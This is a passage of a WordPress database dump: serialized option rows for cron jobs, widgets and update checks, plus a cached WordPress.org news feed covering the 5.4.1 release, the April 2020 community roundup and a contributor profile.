0:{}s:8:\"interval\";i:604800;}}s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1588749920;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1588749921;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}s:7:\"version\";i:2;}','yes'),(104,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(110,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(111,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(112,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(113,'recovery_keys','a:0:{}','yes'),(114,'theme_mods_twentytwenty','a:1:{s:18:\"custom_css_post_id\";i:-1;}','yes'),(116,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.4.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.4.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.4.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.4.1-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.4.1\";s:7:\"version\";s:5:\"5.4.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.3\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1588663498;s:15:\"version_checked\";s:5:\"5.4.1\";s:12:\"translations\";a:0:{}}','no'),(123,'w3tc_state','{\"common.install\":1588663520,\"common.install_version\":\"0.13.2\",\"license.status\":\"no_key\",\"license.next_check\":1589095520,\"license.terms\":\"\"}','no'),(118,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1588663498;s:7:\"checked\";a:2:{s:19:\"akismet/akismet.php\";s:5:\"4.1.5\";s:9:\"hello.php\";s:5:\"1.7.2\";}s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:2:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"4.1.5\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.4.1.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";s:2:\"1x\";s:59:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=969272\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}}s:9:\"hello.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855\";s:2:\"1x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855\";}s:11:\"banners_rtl\";a:0:{}}}}','no'),(119,'_site_transient_timeout_theme_roots','1588665298','no'),(120,'_site_transient_theme_roots','a:3:{s:14:\"twentynineteen\";s:7:\"/themes\";s:15:\"twentyseventeen\";s:7:\"/themes\";s:12:\"twentytwenty\";s:7:\"/themes\";}','no'),(121,'_site_transient_update_themes','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1588663498;s:7:\"checked\";a:3:{s:14:\"twentynineteen\";s:3:\"1.5\";s:15:\"twentyseventeen\";s:3:\"2.3\";s:12:\"twentytwenty\";s:3:\"1.2\";}s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}}','no'),(122,'w3tc_extensions_hooks','{\"actions\":[],\"filters\":[],\"next_check_date\":1588749920}','yes'),(124,'_site_transient_timeout_browser_267bde5badd5f244b85b83450accebb5','1589268321','no'),(125,'_site_transient_browser_267bde5badd5f244b85b83450accebb5','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"81.0.4044.129\";s:8:\"platform\";s:7:\"Windows\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(126,'_site_transient_timeout_php_check_aadacc046d972fe89114cd3eaab035a8','1589268321','no'),(127,'_site_transient_php_check_aadacc046d972fe89114cd3eaab035a8','a:5:{s:19:\"recommended_version\";s:3:\"7.3\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(128,'_transient_timeout_w3tc.verify_plugins','1589268321','no'),(129,'_transient_w3tc.verify_plugins','1','no'),(131,'_site_transient_timeout_community-events-a46d2a3eb948bdd1c28ef2e23166bd0a','1588706728','no'),(132,'_site_transient_community-events-a46d2a3eb948bdd1c28ef2e23166bd0a','a:3:{s:9:\"sandboxed\";b:0;s:8:\"location\";a:1:{s:2:\"ip\";s:12:\"37.111.135.0\";}s:6:\"events\";a:1:{i:0;a:8:{s:4:\"type\";s:8:\"wordcamp\";s:5:\"title\";s:23:\"WordCamp España Online\";s:3:\"url\";s:31:\"https://2020.spain.wordcamp.org\";s:6:\"meetup\";N;s:10:\"meetup_url\";N;s:4:\"date\";s:19:\"2020-05-06 14:00:00\";s:8:\"end_date\";s:19:\"2020-05-09 00:00:00\";s:8:\"location\";a:4:{s:8:\"location\";s:6:\"Online\";s:7:\"country\";s:2:\"ES\";s:8:\"latitude\";d:40.4636670000000009395080269314348697662353515625;s:9:\"longitude\";d:-3.74922000000000021913137970841489732265472412109375;}}}}','no'),(133,'can_compress_scripts','0','no'),(134,'_transient_timeout_feed_9bbd59226dc36b9b26cd43f15694c5c3','1588706729','no'),(135,'_transient_feed_9bbd59226dc36b9b26cd43f15694c5c3','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"News – – WordPress.org\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://wordpress.org/news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 04 May 2020 09:31:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"https://wordpress.org/?v=5.5-alpha-47761\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:57:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"The Month in WordPress: April 2020\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2020/05/the-month-in-wordpress-april-2020/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 04 May 2020 09:31:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8571\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:364:\"April continued to be a challenging time for the WordPress community, with many under stay-at-home recommendations. However, it was also an exciting month in which we created new ways to connect with and inspire each other! This month, amazing contributors moved more WordCamps online and shipped new releases for WordPress and Gutenberg. For the latest, […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Angela Jin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:8195:\"\n

April continued to be a challenging time for the WordPress community, with many under stay-at-home recommendations. However, it was also an exciting month in which we created new ways to connect with and inspire each other! This month, amazing contributors moved more WordCamps online and shipped new releases for WordPress and Gutenberg. For the latest, read on. 

\n\n\n\n
\n\n\n\n

WordPress 5.4.1 released

\n\n\n\n

On April 24th,  WordPress 5.4.1 Release Candidate 1 (RC1) was released for testing, quickly followed by the official release of WordPress 5.4.1 on April 29th. This security release features 17 bug fixes and seven security fixes, so we recommend updating your sites immediately. To download WordPress 5.4.1, visit your Dashboard, click on Updates, then Update Now, or download the latest version directly from WordPress.org. For more information, visit this post, review the full list of changes on Trac, or check out the version 5.4.1 HelpHub documentation page.

\n\n\n\n

Want to get involved in building WordPress Core? Follow the Core team blog, and join the #core channel in the Making WordPress Slack group.

\n\n\n\n

Gutenberg 7.9 and 8.0 released

\n\n\n\n

It was another exciting month for Gutenberg, with the release of 7.9 and 8.0! Version 7.9 brought new block design tools, three new patterns, and improved block markup. Gutenberg 8.0 continued to refine the new block patterns feature, with additional options for inline formatting, and extending the functionality of the Code Editor. In addition to these new features, both releases included new enhancements and APIs, along with a number of bug fixes, performance improvements, some experiments, and more! You can read all the details about the latest Gutenberg releases in the announcement posts for 7.9 and 8.0

\n\n\n\n

Want to get involved in building Gutenberg? Follow the Core team blog, contribute to Gutenberg on GitHub, and join the #core-editor channel in the Making WordPress Slack group.

\n\n\n\n

BuddyPress 6.0.0

\n\n\n\n

BuddyPress 6.0.0-beta2 was released for testing in mid-April, leading to the BuddyPress 6.0.0 Release Candidate, announced on April 29. This is an important step before  the final release of BuddyPress 6.0.0, which is slated for Thursday, May 14. Changes and new features in this release include moving the profile photo and user cover image under the BP Members component, and a new BP Rest API. Additionally, this release will introduce the first round of BuddyPress Blocks! Last, but not least, BuddyPress 6.0.0 will require at least PHP 5.6 and WordPress 4.8. 

\n\n\n\n

Want to get involved? Test the 6.0.0-RC here! You can also help by translating BuddyPress into another language, or let the team know of any issues you find, either in the support forums and/or in their development tracker

\n\n\n\n

WordCamp US goes online, apply to speak!

\n\n\n\n

WordCamp US will take place online due to the COVID-19 pandemic. The event still runs from October 27-29, 2020, and will be free to anyone who wishes to attend. The team plans to offer  what WCUS has historically brought to the community in person: sessions and workshops, Contributor Day, a hallway track, and of course, State of the Word. 

\n\n\n\n

Interested in speaking at WCUS? The Call for Speakers is still open! You can apply to speak on the speaker application site until May 31, 2020 at 11:59 pm CDT (UTC-5). 

\n\n\n\n

Additionally, the Call for Cities is also open. If your community is interested in hosting WordCamp US in 2021 & 2022, please fill out this application

\n\n\n\n

For the latest information about WordCamp US, sign up for updates on the website, or follow Facebook, Twitter, or Instagram

\n\n\n\n

WordCamp Europe 2020 goes virtual 

\n\n\n\n

Last month, WordCamp Europe decided to postpone its Porto event to 2021. This April, the WCEU organizing team announced that the 2020 WordCamp will be online! WordCamp Europe 2020 Online will take place from June 4-6, 2020, and tickets will be free. There will be a virtual Contributor Day on June 4, and then two half days of live-streamed talks and workshops. To participate, get your free ticket here

\n\n\n\n

To get the latest news for WordCamp Europe 2020 Online, follow on Facebook, Twitter, LinkedIn, or on Instagram

\n\n\n\n
\n\n\n\n

Further Reading

\n\n\n\n\n\n\n\n

Have a story that we should include in the next “Month in WordPress” post? Please submit it here.

\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8571\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:60:\"\n \n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"WordPress 5.4.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/news/2020/04/wordpress-5-4-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Apr 2020 19:56:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8553\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:363:\"WordPress 5.4.1 is now available! This security and maintenance release features 17 bug fixes in addition to 7 security fixes. Because this is a security release, it is recommended that you update your sites immediately. All versions since WordPress 3.7 have also been updated. WordPress 5.4.1 is a short-cycle security and maintenance release. The next […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jake Spurlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:7025:\"\n

WordPress 5.4.1 is now available!

\n\n\n\n

This security and maintenance release features 17 bug fixes in addition to 7 security fixes. Because this is a security release, it is recommended that you update your sites immediately. All versions since WordPress 3.7 have also been updated.

\n\n\n\n

WordPress 5.4.1 is a short-cycle security and maintenance release. The next major release will be version 5.5.

\n\n\n\n

You can download WordPress 5.4.1 by downloading from WordPress.org, or visit your Dashboard → Updates and click Update Now.

\n\n\n\n

If you have sites that support automatic background updates, they’ve already started the update process.

\n\n\n\n

Security Updates

\n\n\n\n

Seven security issues affect WordPress versions 5.4 and earlier. If you haven’t yet updated to 5.4, all WordPress versions since 3.7 have also been updated to fix the following security issues:

\n\n\n\n\n\n\n\n

Thank you to all of the reporters for privately disclosing the vulnerabilities. This gave the security team time to fix the vulnerabilities before WordPress sites could be attacked.

\n\n\n\n

For more information, browse the full list of changes on Trac, or check out the version 5.4.1 HelpHub documentation page.

\n\n\n\n

In addition to the security researchers mentioned above, thank you to everyone who helped make WordPress 5.4.1 happen:

\n\n\n\n

Alex Concha, Andrea Fercia, Andrew Duthie, Andrew Ozz, Andy Fragen, Andy Peatling, arnaudbroes, Chris Van Patten, Daniel Richards, DhrRob, Dono12, dudo, Ehtisham Siddiqui, Ella van Durpe, Garrett Hyder, Ian Belanger, Ipstenu (Mika Epstein), Jake Spurlock, Jb Audras, John Blackbourn, John James Jacoby, Jonathan Desrosiers, Jorge Costa, K. Adam White, Kelly Choyce-Dwan, MarkRH, mattyrob, Miguel Fonseca, Mohammad Jangda, Mukesh Panchal, Nick Daugherty, noahtallen, Paul Biron, Peter Westwood, Peter Wilson, pikamander2, r-a-y, Riad Benguella, Robert Anderson, Samuel Wood (Otto), Sergey Biryukov, Søren Brønsted, Stanimir Stoyanov, tellthemachines, Timothy Jacobs, Toro_Unit (Hiroshi Urabe), treecutter, and yohannp.

\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8553\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:60:\"\n \n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"People of WordPress: Mario Peshev\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wordpress.org/news/2020/04/people-of-wordpress-mario-peshev/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 08 Apr 2020 00:57:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:9:\"Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:9:\"heropress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8536\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:158:\"In the April edition of our \"People of WordPress\" series, you\'ll find out how Mario Peshev went from self-taught developer to teaching basic digital literacy.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Yvette Sonneveld\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:12069:\"\n

You’ve probably heard that WordPress is open source software, and may know that it’s created and run by volunteers. Enthusiasts share many examples of how WordPress has changed people’s lives for the better. In this monthly series, we share some of those lesser-known, amazing stories.

\n\n\n\n

Computer science in the nineties

\n\n\n\n
\"\"
Mario Peshev
\n\n\n\n

Mario has been hooked on computers ever since he got his first one in 1996. He started with digging into MS-DOS and Windows 3.1 first and learned tons by trial and error. Following that adventure, Mario built his first HTML site in 1999. He found development so exciting that he spent day and night learning QBasic and started working at the local PC game club. Mario got involved with several other things related to website administration (translating security bulletins, setting up simple sites, etc) and soon found the technology field was full of activities he really enjoyed.

\n\n\n\n

The Corporate Lifestyle

\n\n\n\n

Mario started studying programming including an intensive high-level course for C#, Java development, and software engineering, and eventually got a job in a corporate environment. He soon became a team lead there, managing all the planning and paperwork for their projects.

\n\n\n\n

But he continued freelancing on the side. He grew his own network of technical experts through attending, volunteering at, and organizing conferences. He also ran a technical forum and regularly spoke at universities and enterprise companies.

\n\n\n\n

Remote Working and Business Opportunity

\n\n\n\n

The combination of a high workload and a daily three-hour-long commute made Mario’s life difficult. Many of his friends were still studying, traveling or unemployed. The blissful and calm lives they lived seemed like a fairy tale to him. And even while both his managers and his clients were abroad, he was unable to obtain permission to work remotely. 

\n\n\n\n

So Mario decided to leave his job and start freelancing full time. But he found he faced a massive challenge. 

\n\n\n\n

He discovered Java projects were pretty large and required an established team of people working together in an office. All job opportunities were on-site, and some even required relocation abroad. Certified Java programmers weren’t being hired on a remote basis. 

\n\n\n\n

As Mario had some PHP experience from previous jobs, he used this to start his freelance career. For his projects, he used both plain PHP and PHP frameworks like CakePHP and CodeIgniter. 

\n\n\n\n

For a while, Mario accepted work using commonly known platforms including Joomla, Drupal, and WordPress. In addition, he worked on PHP, Java, Python and some C# projects for a couple of years, after which he decided to switch to WordPress completely.

\n\n\n\n

Building products

\n\n\n\n

One of his projects involved a technically challenging charity backed by several international organizations. Unexpected shortages in the team put him in the technical lead position. As a result, Mario found himself planning the next phases, meeting with the client regularly, and renegotiating the terms. The team completed the project successfully, and after the launch, a TV campaign led millions of visitors to the website.

\n\n\n\n

As a result of the successful launch, this client invited Mario to participate in more WordPress projects, including building a custom framework.

\n\n\n\n

“I wasn’t that acquainted with WordPress back then. For me, a conventional person trained in architectural design patterns and best practices, WordPress seemed like an eccentric young hipster somewhere on the line between insane and genius at the same time. I had to spend a couple of months learning WordPress from the inside out.”

Mario Peshev
\n\n\n\n

As his interest in WordPress grew, Mario stopped delivering other custom platforms, and converted clients to WordPress. 

\n\n\n\n

European Community

\n\n\n\n
\"Mario
Mario presenting at a WordCamp
\n\n\n\n

For Mario, one of the key selling points of WordPress was the international openness. He had previously been involved with other open source communities, some of which were US-focused. He felt they were more reliant on meeting people in person. With events only taking place in the US, this made building relationships much harder for people living in other countries.

\n\n\n\n

While the WordPress project started out in the US, the WordPress community quickly globalized. Dozens of WordCamps and hundreds of Meetup events take place around the globe every year.  All of these events bring a wide variety of people sharing their enthusiasm for WordPress together.

\n\n\n\n

For Mario, the birth of WordCamp Europe was something magical. The fact that hundreds, and later on thousands, of people from all over the world gathered around the topic of WordPress speaks for itself. Mario has been involved with organizing WordCamp Europe twice (in 2014 and 2015). 

\n\n\n\n

“There’s nothing like meeting WordPress enthusiasts and professionals from more than 50 countries brainstorming and working together at a WordCamp. You simply have to be there to understand how powerful it all is.”

Mario Peshev
\n\n\n\n

Growing businesses and teams

\n\n\n\n

A key WordPress benefit is its popularity – an ever growing project currently powering more than 35% of the Internet [2020]. It’s popular enough to be a de facto standard for websites, platforms, e-commerce and blogs. 

\n\n\n\n

WordPress has a low barrier to entry. You can achieve a lot without being an expert, meaning most people can start gaining experience without having to spend years learning how to code. That also makes it easier to build businesses and teams.

\n\n\n\n

“Being able to use a tool that is user-friendly, not overly complicated and easily extensible makes introducing it to team members faster and easier. It requires less time for adjustment, and as a result makes a team stronger and faster. The fact that this tool is cost-effective also allows more startups to enter the market. It requires  less time and investments to launch an MVP. This boosts the entire ecosystem.”

Mario Peshev
\n\n\n\n

Helping Others

\n\n\n\n

Mario also introduced WordPress to children and young people. He taught them how to use WordPress as a tool for homework and class assignments. By using WordPress, they were able to learn the basics of designing themes, developing plugins, marketing statistics, social media, copywriting, and so much more. This approachable introduction to the software meant technical skills were not needed.

\n\n\n\n

He was also part of a team of volunteers who helped a group of young people living at a foster home struggling to provide for themselves. The team taught the basic digital literacy skills necessary in the modern workplace and potentially pay for their rent and basic needs. This included working with Microsoft Word, Excel and WordPress, as well as some basic design and marketing skills. 

\n\n\n\n

“When you look at that from another perspective, a platform that could save lives – literally – and change the world for better is worth contributing to, in any possible manner.”

Mario Peshev
\n\n\n\n

Contributing to the WordPress community

\n\n\n\n

